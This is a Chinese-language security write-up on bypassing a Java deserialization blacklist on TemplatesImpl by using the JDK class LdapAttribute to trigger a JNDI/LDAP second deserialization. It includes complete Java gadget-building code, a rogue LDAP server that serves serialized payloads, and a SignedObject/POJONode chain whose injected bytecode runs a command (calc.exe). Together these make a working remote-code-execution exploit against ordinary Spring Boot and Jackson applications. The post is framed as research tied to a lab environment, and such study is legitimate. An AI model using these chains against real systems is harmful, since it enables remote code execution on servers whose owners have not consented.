使用JDK类绕过TemplatesImpl黑名单

0x00 介绍

一次挖洞过程中，遇到了 TemplatesImpl resolveClass 黑名单，后来想起 RWCTF 中的一道题目，成功绕过该黑名单。于是和大家分享这个思路，并编写了对应的环境和靶机，希望大家可以有所收获

这个黑名单内容如下

`private static final List<Object> BLACKLIST = Arrays.asList(`        `"java.security.SignedObject",`        `"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet",`        `"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",`        `"com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter"``);`

可以看到 SignedObject 也加入了黑名单中，在先知中已有文章说明如果通过 SignedObject#getObject 方法进行二次反序列化

0x01 分析

TemplatesImpl 链是一般调用栈如下

`-> getOutputProperties``-> newTransformer``-> getTransletInstance``-> defineTransletClasses``-> defineClass`

调用 getter 后最终调用 defineClass 加载了反射设置的 _bytecodes

最常见的两个链，底层都是TemplateImpl

（1）CB 链 - 最新版的 CB 链仍然能够利用，实战价值较大

（2）Jackson 链 - 能打 SpringBoot 默认原生反序列化的链

以 CB 链为例，调用 getOutputProperties 方法的过程如下：BeanComparator 类 compare 方法调用已设置属性的 getter 方法，当对象位 TemplateImpl 且属性是 outputProperties 时完成整个链

`getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)``// ...``getSimpleProperty:1279, PropertyUtilsBean (org.apache.commons.beanutils)``getNestedProperty:809, PropertyUtilsBean (org.apache.commons.beanutils)``getProperty:885, PropertyUtilsBean (org.apache.commons.beanutils)``getProperty:464, PropertyUtils (org.apache.commons.beanutils)``compare:163, BeanComparator (org.apache.commons.beanutils)`

不难看出，这里只要是一个 getter 触发点即可

BeanComparator#compare -> AnyObject#getAny-> RCE

再来看 Jackson POJONode 原生链

`getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)``// ...``serialize:115, POJONode (com.fasterxml.jackson.databind.node)``// ...``writeValueAsString:1140, ObjectWriter (com.fasterxml.jackson.databind)``// ...``nodeToString:34, InternalNodeMapper (com.fasterxml.jackson.databind.node)``toString:68, BaseJsonNode (com.fasterxml.jackson.databind.node)``readObject:86, BadAttributeValueExpException (javax.management)`

POJONode 父类 BaseJsonNode 包含 toString 方法，通过 Bad...Exception 触发。在 Jackson 中把对象序列化到 JSON 字符串的方法是 ObjectMapper#writeValueAsString

在 POJONode 的 serialize 方法中，如果目标类型不是 JsonSerializable 将会进入 defaultSerializaValue 方法

最终在 BeanSerializerBase#serializeFields 中遍历所有属性，反射调用其 getter 方法

可以看出，无论 CB 还是 Jackson 原生链，底层逻辑一致：寻找一个可以导致 RCE 的 getter 方法和类即可

0x02 寻找类

寻找一个可以导致 RCE 的 getter 方法和类

能想到比较有可能思路大概有：getConnection -> ctx.lookup -> JNDI

遗憾这种思路可能存在于第三方库中，在 JDK 中找不到符合的

在 RWCTF 中，出题师傅发现 com.sun.jndi.ldap.LdapAttribute 类存在 getter 可以导致 JNDI 注入，这个类从低版本 JDK 到 8 都适用

该类中存在两处 getter 可以调用传统的 ctx.lookup 方法

然而这两个方法的 lookup 内容并不完全可控，因此无法利用

这里利用的是 java.naming.provider.url 属性，通过 getBaseCtx 方法设置 JNDI 的环境属性，再通过 getAttributeDefinition 调用 c_lookup

而漏洞的出发点，还在 getAttributeDefinition 方法中，但不再是 lookup 方法，而是 getBaseCtx 后通过 getSchema 触发

在 LdapCtxFactory 的 getInitialContext 方法中，读取了 JDNI Env 设置的 java.naming.provider.url 属性

在getUsingURLs 方法，一步步进入 LdapCtx 构造方法，通过 socket 与原创 LDAP 服务端建立了连接

在 getSchema 方法时，可以进入 LdapCtx#c_lookup 方法

`c_lookup:1017, LdapCtx (com.sun.jndi.ldap)``c_resolveIntermediate_nns:168, ComponentContext (com.sun.jndi.toolkit.ctx)``c_resolveIntermediate_nns:359, AtomicContext (com.sun.jndi.toolkit.ctx)``p_resolveIntermediate:397, ComponentContext (com.sun.jndi.toolkit.ctx)``p_getSchema:432, ComponentDirContext (com.sun.jndi.toolkit.ctx)``getSchema:422, PartialCompositeDirContext (com.sun.jndi.toolkit.ctx)``getSchema:210, InitialDirContext (javax.naming.directory)``getAttributeDefinition:207, LdapAttribute (com.sun.jndi.ldap)`

当 LDAP Server 返回的 javaClassName 不为空时进入 decodeObject

当 javaSerializedData 数据不为空时，进入反序列化对象的方法

最终可以再次触发反序列化

另外，普通的 ctx.lookup 触发的点也是 c_lookup（调用栈如下）

`c_lookup:1017, LdapCtx (com.sun.jndi.ldap)``p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)``lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)``lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)``lookup:94, ldapURLContext (com.sun.jndi.url.ldap)``lookup:417, InitialContext (javax.naming)`

总结：LdapAttribute 这条链如下

`LdapAttribute # getAttributeDefinition`   `this.getBaseCtx()``LdapAttribute # getBaseCtx`  `this.baseCtxEnv.put("java.naming.provider.url", this.baseCtxURL);`  `this.baseCtx = new InitialDirContext(this.baseCtxEnv);``LdapAttribute # getAttributeDefinition`  `baseCtx.getSchema(this.rdn)``LdapCtx # c_lookup``Obj # deserializeObject`

该绕过不仅可以在低版本 JDK 复现，在高版本 JDK 中也适用

0x03 复现

在复现之前，存在最后一个问题，为什么可以绕过黑名单

resolveClass 方法的作用是根据类的名称获取对应的 Class 对象，并通过类加载器加载该类。重写 resolveClass 方法的作用范围是使用了该 ObjectInputStream 类进行 readObject 操作时。不会影响到其他 ObjectInputStream 的 readObject 操作

简单来说，外层的黑名单不负责内部 readObject 操作的安全

`new ObjectInputStream(`        `new ByteArrayInputStream(byteArrayOutputStream.toByteArray())) {`    `@Override`    `protected Class<?> resolveClass(ObjectStreamClass desc)`            `throws IOException, ClassNotFoundException {`        `System.out.println(desc.getName());`        `return super.resolveClass(desc);`    `}``}.readObject();`

一次反序列化经过 resolveClass 的所有类如下

`javax.management.BadAttributeValueExpException``java.lang.Exception``java.lang.Throwable``[Ljava.lang.StackTraceElement;``java.lang.StackTraceElement``java.util.Collections$UnmodifiableList``java.util.Collections$UnmodifiableCollection``java.util.ArrayList``com.fasterxml.jackson.databind.node.POJONode``com.fasterxml.jackson.databind.node.ValueNode``com.fasterxml.jackson.databind.node.BaseJsonNode``com.sun.jndi.ldap.LdapAttribute``javax.naming.directory.BasicAttribute``javax.naming.CompositeName`

如果想要复现这个绕过，我们需要自行写一个 LdapServer

`public class LDAPServer {`    `private static final String LDAP_BASE = "dc=example,dc=com";``   `    `public static void main(String[] args) {`        `int port = 1389;`        `try {`            `InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);`            `config.setListenerConfigs(new InMemoryListenerConfig(`                    `"listen",`                    `InetAddress.getByName("0.0.0.0"),`                    `port,`                    `ServerSocketFactory.getDefault(),`                    `SocketFactory.getDefault(),`                    `(SSLSocketFactory) SSLSocketFactory.getDefault()));``   `            `config.addInMemoryOperationInterceptor(new OperationInterceptor());`            `InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);`            `System.out.println("Listening on 0.0.0.0:" + port);`            `ds.startListening();`        `} catch (Exception e) {`            `e.printStackTrace();`        `}`    `}``   `    `private static class OperationInterceptor extends InMemoryOperationInterceptor {`        `@Override`        `public void processSearchResult(InMemoryInterceptedSearchResult result) {`            `String base = result.getRequest().getBaseDN();``   `            `Entry entry = new Entry(base);`            `entry.addAttribute("javaClassName", "Y4Sec");`            `try {`                `entry.addAttribute("javaSerializedData", JacksonTemplatePayload.getData());`                `result.sendSearchEntry(entry);`                `result.setResult(new LDAPResult(0, ResultCode.SUCCESS));`                `System.out.println("Send javaSerializedData");`            `} catch (Exception e) {`                `e.printStackTrace();`            `}`        `}`    `}``}`

构建链的部分代码，替换了 getter 部分即可

`public static void main(String[] args) throws Exception {`    `CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");`    `CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");`    `ctClass.removeMethod(writeReplace);`    `ctClass.toClass();``   `    `POJONode node = new POJONode(getGadgetObj());`    `BadAttributeValueExpException val = new BadAttributeValueExpException(null);`    `Field valfield = val.getClass().getDeclaredField("val");`    `valfield.setAccessible(true);`    `valfield.set(val, node);`    `ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();`    `ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);`    `oos.writeObject(val);`    `System.out.println(new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray())));`     `}``   ``public static BasicAttribute getGadgetObj() {`    `try {`        `Class clazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");`        `Constructor clazz_cons = clazz.getDeclaredConstructor(new Class[]{String.class});`        `clazz_cons.setAccessible(true);`        `BasicAttribute la = (BasicAttribute) clazz_cons.newInstance(new Object[]{"exp"});`        `Field bcu_fi = clazz.getDeclaredField("baseCtxURL");`        `bcu_fi.setAccessible(true);`        `bcu_fi.set(la, "ldap://127.0.0.1:1389/");`        `CompositeName cn = new CompositeName();`        `cn.add("a");`        `cn.add("b");`        `Field rdn_fi = clazz.getDeclaredField("rdn");`        `rdn_fi.setAccessible(true);`        `rdn_fi.set(la, cn);`        `return la;`    `} catch (Exception e) {`        `e.printStackTrace();`    `}`    `return null;``}`

在 LdapServer 中使用正常的 Jackson TemplatesImpl Gadget

该例子中 SignedObject 已经拉黑，该类也可以结合 POJONode 来利用（如果目标拉黑 TemplatesImpl 但是没拉黑 SignedObject 适用）

`public static void main(String[] args) throws Exception {`    `List<Object> list = new ArrayList<>();``   `    `ClassPool pool = ClassPool.getDefault();`    `CtClass ctClass = pool.makeClass("a");`    `CtClass superClass = pool.get(AbstractTranslet.class.getName());`    `ctClass.setSuperclass(superClass);`    `CtConstructor constructor = new CtConstructor(new CtClass[]{}, ctClass);``   `    `constructor.setBody("Runtime.getRuntime().exec(\"calc.exe\");");`    `ctClass.addConstructor(constructor);`    `byte[] bytes = ctClass.toBytecode();`    `TemplatesImpl templatesImpl = new TemplatesImpl();`    `setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});`    `setFieldValue(templatesImpl, "_name", "y4sec");`    `setFieldValue(templatesImpl, "_tfactory", null);``   `    `ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");`    `CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");`    `ctClass.removeMethod(writeReplace);`    `ctClass.toClass();``   `    `POJONode jsonNodes = new POJONode(templatesImpl);``   `    `BadAttributeValueExpException exp = new BadAttributeValueExpException(null);`    `Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");`    `val.setAccessible(true);`    `val.set(exp, jsonNodes);``   `    `list.add(exp);``   `    `KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");`    `kpg.initialize(1024);`    `KeyPair kp = kpg.generateKeyPair();`    `SignedObject signedObject = new SignedObject((Serializable) list, kp.getPrivate(),`            `Signature.getInstance("DSA"));``   `    `POJONode jsonNodes1 = new POJONode(signedObject);``   `    `BadAttributeValueExpException exp1 = new BadAttributeValueExpException(null);`    `val.set(exp1, jsonNodes1);``   `    `ByteArrayOutputStream barr = new ByteArrayOutputStream();`    `ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);`    `objectOutputStream.writeObject(exp1);`    `FileOutputStream fout = new FileOutputStream("1.ser");`    `fout.write(barr.toByteArray());`    `fout.close();``   `    `System.out.println(serial(exp1));``}`

0x04 靶场环境

对于这个问题，我编写了一个靶场，包含了一个 SpringBoot 应用，生成 Gadget 类和 LdapServer 辅助类

完整代码位于

https://github.com/Y4Sec-Team/no-templates

启动 NoTemplatesApplication 应用，使用 JacksonTemplatePayload 类生成普通 TemplatesImpl 链测试，报错该类位于黑名单

使用 SignedObject 二次反序列化绕黑名单同样报错

启动 LdapServer 后使用 JacksonLdapAttrPayload 生成 Payload 测试

成功弹出计算器